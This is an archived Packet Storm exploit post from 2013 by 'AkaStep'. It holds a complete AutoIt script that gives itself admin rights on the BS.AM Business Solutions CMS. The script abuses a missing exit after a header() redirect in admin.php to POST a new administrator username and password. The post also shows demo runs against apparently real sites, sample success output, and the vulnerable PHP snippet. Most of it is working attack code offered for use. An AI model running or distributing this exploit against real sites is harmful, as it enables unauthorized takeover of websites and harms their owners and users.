Business Solutions CMS Add Admin

2013-01-10T00:00:00
ID PACKETSTORM:119500
Type packetstorm
Reporter Akastep
Modified 2013-01-10T00:00:00

Description

                                        
                                            `#cs  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm AkaStep member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
bs_am_remote_add_admin.au3  
  
  
BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.  
THIS IS A EXPLOIT WRITTEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.  
ON SUCCESSFULL REMOTE EXPLOITATION IT WILL NEW ADMIN TO TARGET SITE.  
  
***** THIS IS A WHOLE EXPLOIT! *****  
THANK YOU!  
  
FEW DEMOS:  
  
http://asba.am  
http://doors.am  
  
  
  
DEMO USAGE:  
  
>poc.exe http://asba.am bigbang bigbang  
  
  
##############################################################  
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)  
Usage: poc.exe http://site.tld username password  
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]  
[@@@] Vuln & Exploit By AkaStep [@@@]  
##############################################################  
[+] GETTING INFO ABOUT CMS [+]  
[*] GOT Response : Yes! It is exactly that we are looking for! [*]  
  
##################################################  
Trying to add new admin:  
To Site:www.asba.am  
With Username: bigbang  
With Password: bigbang  
##################################################  
  
##################################################  
Exploit Try Count:1  
##################################################  
Error Count: 0  
##################################################  
  
##################################################  
Exploit Try Count:2  
##################################################  
Error Count: 0  
##################################################  
Count of errors during exploitation : 0  
  
##################################################  
[*] Seems we are going to travel xD. [*]  
Try to login @  
Site: asba.am/cms/index.php  
With Username: bigbang  
With Password: bigbang  
##################################################  
[*] Exit [*]  
##################################################  
  
  
  
  
  
  
  
  
VULNERABLE CODE:  
NOTICE script continues it's execution.Because missing exit; after header();  
FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;)  
  
//cms/admin.php  
  
============SNIP BEGINS============  
<?  
session_start();  
if ($_SESSION['login11_error'] != "no")  
header("Location: index.php");  
include 'config.php';?>  
<!DOCTYPE html  
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html>  
<head>  
<title>cms::</title>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">  
<link rel="stylesheet" type="text/css" href="css/main.css" />  
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>  
  
<script type="text/javascript" src="javascript/admin.js"></script>  
<script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>  
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>  
  
<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>  
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />  
</head>  
<body>  
<div id="header">  
  
============SNIP ENDS HERE===========  
  
  
  
#ce  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#NoTrayIcon  
#include "WinHttp.au3"  
#include <inet.au3>  
#include <String.au3>  
  
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _  
'(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _  
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _  
@CRLF & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _  
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);  
ConsoleWrite(@CRLF & $exploitname & @CRLF)  
  
$method='POST';  
$vulnurl='cms/admin.php?lang=en&page=security';  
Global $count=0,$error=0;  
$cmsindent='CaptchaSecurityImages.php';  
$adminpanel='/cms/index.php';  
  
if $CmdLine[0] <> 3 Then  
MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF);  
exit;  
EndIf  
  
  
if $CmdLine[0]=3 Then  
$targetsite=$CmdLine[1];  
$username=$CmdLine[2];  
$password=$CmdLine[3];  
EndIf  
  
  
  
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then  
ConsoleWrite('Are you kidding me?');  
Exit;  
EndIf  
  
  
  
$doublecheck=InetGet($targetsite,'',1);  
if @error Then  
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)  
Exit;  
EndIf  
  
  
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);  
sleep(Random(1200,2500,1));  
  
  
  
  
$sidentify=_INetGetSource($targetsite & $adminpanel,True);  
  
  
  
  
if StringInStr($sidentify,$cmsindent) Then  
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)  
Else  
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)  
$error+=1;  
EndIf  
  
  
  
  
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')  
  
  
priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~#  
  
Func priv8($targetsite,$username,$password,$count,$error)  
  
  
$count+=1;  
  
  
Global $sAddress = $targetsite  
  
$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;  
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _  
$username & @CRLF & 'With Password: ' & $password & $triptrop;  
if $count <=1 then ConsoleWrite($whatcurrentlywedo)  
  
$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop;  
ConsoleWrite($doitnicely);  
Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes";  
  
  
if $error>=2 OR $count>=2 Then  
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)  
  
if int($error)=0 then  
ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & _  
@CRLF & 'Try to login @ ' & @CRLF & _  
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _  
$username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);  
exit;  
Else  
  
ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _  
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _  
'[*] May be you are Lucky;) [*]' & _  
@CRLF & 'Try to login @ ' & @CRLF & _  
'Site: ' & $targetsite & $adminpanel & @CRLF & _  
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);  
  
EndIf  
exit;  
  
EndIf  
  
  
  
Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)");  
  
  
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)  
  
  
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');  
  
  
  
  
  
  
  
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")  
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")  
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")  
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")  
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")  
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")  
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));  
  
  
  
  
  
  
_WinHttpSendRequest($hRequest, -1, $sPostData)  
  
_WinHttpReceiveResponse($hRequest)  
  
Global $sHeader, $sReturned  
If _WinHttpQueryDataAvailable($hRequest) Then  
$sHeader = _WinHttpQueryHeaders($hRequest)  
Do  
$sReturned &= _WinHttpReadData($hRequest)  
Until @error  
  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
  
$targetsite=StringMid($targetsite,5,StringLen($targetsite))  
Sleep(1500);  
priv8($targetsite,$username,$password,$count,$error);  
  
Else  
$error+=1  
  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
  
$targetsite=StringMid($targetsite,5,StringLen($targetsite))  
Sleep(1500);  
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#  
  
EndIf  
  
EndFunc;=> priv8();  
  
  
#cs  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
#ce  
`